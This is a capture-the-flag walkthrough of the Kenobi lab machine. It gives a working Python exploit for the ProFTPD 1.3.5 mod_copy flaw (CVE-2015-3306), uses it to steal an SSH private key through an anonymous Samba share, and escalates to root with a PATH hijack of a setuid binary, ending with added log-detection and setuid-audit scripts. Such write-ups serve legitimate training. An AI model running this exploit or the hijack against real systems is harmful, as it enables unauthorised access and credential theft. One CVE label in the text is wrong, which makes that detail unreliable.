Kenobi Walkthrough

$ nmap -p- 10.10.245.2
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-26 11:49 IST
Initiating Ping Scan at 11:49
Scanning 10.10.245.2 [2 ports]
Completed Ping Scan at 11:49, 0.16s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:49
Completed Parallel DNS resolution of 1 host. at 11:49, 2.19s elapsed
DNS resolution of 1 IPs took 2.19s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 11:49
Scanning 10.10.245.2 [11 ports]
Discovered open port 21/tcp on 10.10.245.2
Discovered open port 111/tcp on 10.10.245.2
Discovered open port 445/tcp on 10.10.245.2
Discovered open port 80/tcp on 10.10.245.2
Discovered open port 139/tcp on 10.10.245.2
Discovered open port 22/tcp on 10.10.245.2
Discovered open port 56665/tcp on 10.10.245.2
Discovered open port 37907/tcp on 10.10.245.2
Discovered open port 60413/tcp on 10.10.245.2
Discovered open port 49195/tcp on 10.10.245.2
Discovered open port 2049/tcp on 10.10.245.2
Completed Connect Scan at 11:49, 0.32s elapsed (11 total ports)
Nmap scan report for 10.10.245.2
Host is up, received syn-ack (0.16s latency).
Scanned at 2021-06-26 11:49:45 IST for 2s

PORT      STATE SERVICE      REASON
21/tcp    open  ftp          syn-ack
22/tcp    open  ssh          syn-ack
80/tcp    open  http         syn-ack
111/tcp   open  rpcbind      syn-ack
139/tcp   open  netbios-ssn  syn-ack
445/tcp   open  microsoft-ds syn-ack
2049/tcp  open  nfs          syn-ack
37907/tcp open  unknown      syn-ack
49195/tcp open  unknown      syn-ack
56665/tcp open  unknown      syn-ack
60413/tcp open  unknown      syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.74 seconds
$ nmap -sV -sC -p21,22,80,111,139,445,2049,37907,49195,56665,60413 10.10.245.2
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-26 11:52 IST
Nmap scan report for 10.10.245.2
Host is up (0.16s latency).

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         ProFTPD 1.3.5
22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp    open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      40951/tcp6  mountd
|   100005  1,2,3      43471/udp   mountd
|   100005  1,2,3      45190/udp6  mountd
|   100005  1,2,3      56665/tcp   mountd
|   100021  1,3,4      36497/udp   nlockmgr
|   100021  1,3,4      37907/tcp   nlockmgr
|   100021  1,3,4      41275/tcp6  nlockmgr
|   100021  1,3,4      45173/udp6  nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp  open  nfs_acl     2-3 (RPC #100227)
37907/tcp open  nlockmgr    1-4 (RPC #100021)
49195/tcp open  mountd      1-3 (RPC #100005)
56665/tcp open  mountd      1-3 (RPC #100005)
60413/tcp open  mountd      1-3 (RPC #100005)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -2s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2021-06-26T01:23:10-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-06-26T06:23:10
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.28 seconds

CVE-2015-3306 -> Remote Command Execution

CVE-2016-6210 -> Username Enumeration

CVE-2016-6210 -> Local Privilege Escalation

No Juicy Information

No Juicy Information

$ smbclient -N -L \\\\10.10.245.2\\

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk
        IPC$            IPC       IPC Service (kenobi server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
$ smbclient -N \\\\10.10.245.2\\anonymous
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Sep  4 16:19:09 2019
  ..                                  D        0  Wed Sep  4 16:26:07 2019
  log.txt                             N    12237  Wed Sep  4 16:19:09 2019

                9204224 blocks of size 1024. 6877100 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (14.8 KiloBytes/sec) (average 14.8 KiloBytes/sec)
smb: \>
$ cat log.txt
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi

[anonymous]
   path = /home/kenobi/share
   browseable = yes
   read only = yes
   guest ok = yes

No Juicy Information


Using the ProFTPD RCE together with the information found in log.txt on the Samba share, we will copy kenobi's id_rsa into the Samba share.

SSH Private Key Information

Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory '/home/kenobi/.ssh'.

Samba Share Information

[anonymous]
   path = /home/kenobi/share

Exploit Code

#!/usr/bin/env python3
import socket
from sys import argv as _arg_
from threading import Thread
from time import sleep
'''
proftpd 1.3.5 is vulnerable to Copy Remote Command Execution (mod_copy, CVE-2015-3306):
the SITE CPFR / SITE CPTO commands are accepted without any login.
usage: proftpd_1.3.5.py <TARGET_IP> <PORT> <PATH_TO_COPY> <PATH_TO_PASTE>
   eg: proftpd_1.3.5.py 10.2.43.12 21 /home/user/FileToCopy /var/tmp/PathToPaste
'''
def main():
    core = {
        "MAIN": {
            "COPY": b"SITE CPFR ",   # mark the source path
            "PAST": b"SITE CPTO ",   # copy it to the destination path
        },
        "PRINT": {
            "SUCCESS": "[*] Connection status\t[ok]",
            "FAIL": "[!] Connection status\t[PipeBroken]",
            "OUT": "[RES] ",
            "TITLE": "\n[*] proftpd 1.3.5 is vulnerable to Copy Remote Command Execution"
        },
        "LN": "\n",
        "ENCODE": "UTF-8",
        "SIZE": 1024
    }
    IP = _arg_[1]
    PORT = int(_arg_[2])
    CPFROM = _arg_[3] + core["LN"]
    CPTO = _arg_[4] + core["LN"]

    def receive(PROFTPD135, core):
        # Print the banner and the reply to each of the two SITE commands.
        for _ in range(3):
            try:
                data = PROFTPD135.recv(core["SIZE"])
            except OSError:
                return
            if not data:
                return
            print(core["PRINT"]["OUT"] + data.decode(core["ENCODE"], "replace"), end="")
            sleep(0.2)
    try:
        PROFTPD135 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        PROFTPD135.connect((IP, PORT))
        print(core["PRINT"]["SUCCESS"] + core["PRINT"]["TITLE"])
        # daemon=True so an unfinished reader does not keep the process alive
        Thread(target=receive, args=(PROFTPD135, core), daemon=True).start()
        PROFTPD135.sendall(core["MAIN"]["COPY"] + CPFROM.encode(core["ENCODE"]))
        PROFTPD135.sendall(core["MAIN"]["PAST"] + CPTO.encode(core["ENCODE"]))
        sleep(10)   # give the server time to answer before closing
        PROFTPD135.close()
    except OSError:
        # only network errors are expected here; a bare except would also hide them
        print(core["PRINT"]["FAIL"])

if __name__ == "__main__":
    if len(_arg_) != 5:
        print(_arg_[0] + " <TARGET_IP> <PORT> <PATH_TO_COPY> <PATH_TO_PASTE>")
        raise SystemExit(1)
    main()

Exploitation

$ python3 proexploit.py 10.10.245.2 21 /home/kenobi/.ssh/id_rsa /home/kenobi/share/id_rsa.txt
[*] Connection status    [ok]
[*] proftpd 1.3.5 is vulnerable to Copy Remote Command Execution
[RES] 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.245.2]
350 File or directory exists, ready for destination name
[RES] 250 Copy successful
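The exchange above is the whole attack: two SITE commands and the 350/250 replies, with no USER/PASS beforehand. As an added example (not part of the original post), here is a detector over a constructed FTP command log that flags CPFR/CPTO issued by a session that never authenticated, plus authenticated copies that touch sensitive paths. The log format, the client IPs and the session ids are my own constructions, not ProFTPD's ExtendedLog layout.

```python
import re

# Constructed sample log: "timestamp client session command [argument]".
# Session s2 issues the mod_copy commands without ever sending USER/PASS.
SAMPLE_LOG = """\
2021-06-26T07:36:01 10.10.14.5 s1 USER anonymous
2021-06-26T07:36:01 10.10.14.5 s1 PASS ****
2021-06-26T07:36:02 10.10.14.5 s1 LIST
2021-06-26T07:36:40 10.10.14.9 s2 SITE CPFR /home/kenobi/.ssh/id_rsa
2021-06-26T07:36:40 10.10.14.9 s2 SITE CPTO /home/kenobi/share/id_rsa.txt
2021-06-26T07:37:10 10.10.14.5 s1 SITE CPFR /pub/readme.txt
2021-06-26T07:37:10 10.10.14.5 s1 SITE CPTO /pub/readme.bak
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)(?: (.*))?$")
# Paths nobody should be copying through an FTP share (my own short list).
SENSITIVE = re.compile(r"(^|/)\.ssh(/|$)|^/etc/|^/root/")


def detect_mod_copy_abuse(log_text):
    """Return findings as (session, client, reason, path) tuples."""
    authed = set()      # sessions that sent PASS (assumption: PASS seen == login attempt)
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _ts, client, session, cmd, arg = m.groups()
        cmd, arg = cmd.upper(), (arg or "")
        if cmd == "PASS":
            authed.add(session)
            continue
        if cmd != "SITE":
            continue
        sub, _, path = arg.partition(" ")
        sub = sub.upper()
        if sub not in ("CPFR", "CPTO"):
            continue
        if session not in authed:
            # The CVE-2015-3306 pattern: mod_copy commands accepted before authentication.
            findings.append((session, client, "pre-auth SITE " + sub, path))
        elif SENSITIVE.search(path):
            findings.append((session, client, "sensitive path in SITE " + sub, path))
    return findings


if __name__ == "__main__":
    for f in detect_mod_copy_abuse(SAMPLE_LOG):
        print(*f)
```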

Getting PrivateKey of Kenobi

$ smbclient -N \\\\10.10.245.2\\anonymous
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jun 26 13:06:42 2021
  ..                                  D        0  Wed Sep  4 16:26:07 2019
  id_rsa.txt                          N     1675  Sat Jun 26 13:06:42 2021
  log.txt                             N    12237  Wed Sep  4 16:19:09 2019
                9204224 blocks of size 1024. 6877092 blocks available
smb: \> get id_rsa.txt
getting file \id_rsa.txt of size 1675 as id_rsa.txt (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec)
smb: \>

Log in to the machine with kenobi's private key and get the user flag

$ mv id_rsa.txt id_rsa
$ chmod 600 id_rsa
$ ssh -i id_rsa kenobi@10.10.245.2
The authenticity of host '10.10.245.2 (10.10.245.2)' can't be established.
ECDSA key fingerprint is SHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.245.2' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

kenobi@kenobi:~$
kenobi@kenobi:~$ cat user.txt

user


kenobi@kenobi:~$ find / -type f -perm /4000 2> /dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

/usr/bin/menu looks odd in this list; it is not a standard setuid binary.

Let's run the binary and check what it does.

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :2
4.8.0-58-generic

Nothing much useful. Run strings on the binary.

kenobi@kenobi:~$ strings /usr/bin/menu
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
__isoc99_scanf
puts
__stack_chk_fail
printf
system
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
UH-`
AWAVA
AUATL
[]A\A]A^A_
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
 Invalid choice
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7594
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
menu.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__isoc99_scanf@@GLIBC_2.7
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

curl, uname and ifconfig appear in the strings output as bare command names (no absolute path), right next to the system and setuid symbols. So the binary runs them through system(), and the shell resolves them via PATH.

Use one of them to hijack what /usr/bin/menu executes and get a root shell.
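The pattern above (setuid binary, system() import, command strings without absolute paths) is what a defender should be hunting for across a host. As an added example that is not from the original post, this audit reproduces the strings(1) heuristic in Python, checks each setuid/setgid file for shell-invoking libc functions together with PATH-resolved command strings, and runs on a constructed byte blob standing in for /usr/bin/menu. The KNOWN_TOOLS allow-list is my own assumption about what helper binaries typically shell out to.

```python
import os
import re
import stat

# Printable runs of 4+ bytes, the same default heuristic as strings(1).
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
# A command string whose first token is a bare program name (no '/'), e.g. "curl -I localhost".
BARE_CMD = re.compile(rb"^([A-Za-z][\w.+-]*)(?:\s+\S.*)?$")
# libc entry points that hand a command line to the shell or resolve it via PATH.
SHELL_FUNCS = (b"system", b"popen", b"execvp", b"execlp", b"execvpe")
# Heuristic allow-list of tools a helper binary typically shells out to (assumption).
KNOWN_TOOLS = {b"curl", b"wget", b"uname", b"ifconfig", b"ip", b"cat", b"ls",
               b"ps", b"netstat", b"ss", b"id", b"sh", b"bash"}


def audit_binary(data):
    """Return (shell_funcs_found, relative_commands) for one binary image's bytes."""
    strs = {m.group(0) for m in PRINTABLE.finditer(data)}
    funcs = [f for f in SHELL_FUNCS if f in strs]
    rel = []
    for s in strs:
        m = BARE_CMD.match(s)
        if m and m.group(1) in KNOWN_TOOLS:
            rel.append(s.decode())
    return funcs, sorted(rel)


def is_setuid_or_setgid(path):
    st = os.lstat(path)  # lstat: symlinks are never the privileged object
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))


def audit_tree(root="/"):
    """Yield (path, funcs, commands) for privileged binaries that shell out to PATH-resolved tools."""
    for dirpath, _dirs, files in os.walk(root, onerror=lambda e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if not is_setuid_or_setgid(path):
                    continue
                with open(path, "rb") as f:
                    funcs, cmds = audit_binary(f.read())
            except OSError:
                continue
            if funcs and cmds:
                yield path, funcs, cmds


# Constructed stand-in for /usr/bin/menu: the symbols and strings seen above, not the real ELF.
FAKE_MENU = (b"\x7fELF\x00\x00\x00\x00setuid\x00__isoc99_scanf\x00system\x00"
             b"curl -I localhost\x00uname -r\x00ifconfig\x00 Invalid choice\x00")

if __name__ == "__main__":
    for path, funcs, cmds in audit_tree("/usr/bin"):
        print(path, [f.decode() for f in funcs], cmds)
```

The fix on the binary side is the mirror image of the finding: call tools by absolute path (or execve with a fixed argv and a sanitised environment) and never trust the caller's PATH from a setuid program.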

kenobi@kenobi:~$ cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen
kenobi@kenobi:~$ ls -l /bin/sh /bin/dash /bin/bash /bin/rbash /usr/bin/tmux /usr/bin/screen
-rwxr-xr-x 1 root root 1037528 May 16  2017 /bin/bash
-rwxr-xr-x 1 root root  154072 Feb 17  2016 /bin/dash
lrwxrwxrwx 1 root root       4 Sep  4  2019 /bin/rbash -> bash
lrwxrwxrwx 1 root root       4 Sep  4  2019 /bin/sh -> dash
-rwxr-sr-x 1 root utmp  434216 Feb  7  2016 /usr/bin/screen
-rwxr-xr-x 1 root root  512712 Feb  7  2016 /usr/bin/tmux
kenobi@kenobi:~$

/bin/rbash and /bin/sh are symlinks (to bash and dash) and show o+rwx permissions, so /bin/sh is the shell we hand to the fake curl.

Create a file named curl in the home directory containing /bin/sh and make it executable. With no shebang it is run as a shell script, so it simply starts /bin/sh.

kenobi@kenobi:~$ echo /bin/sh > curl
kenobi@kenobi:~$ chmod 777 curl

Prepend the home directory to PATH so the fake curl is found before /usr/bin/curl.

kenobi@kenobi:~$ export PATH=/home/kenobi:$PATH

Run /usr/bin/menu and pick option 1 (status check), which calls curl; the fake curl spawns a shell with the binary's root uid.

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
#

Get root flag

# cd /root
# ls
root.txt
# cat root.txt

root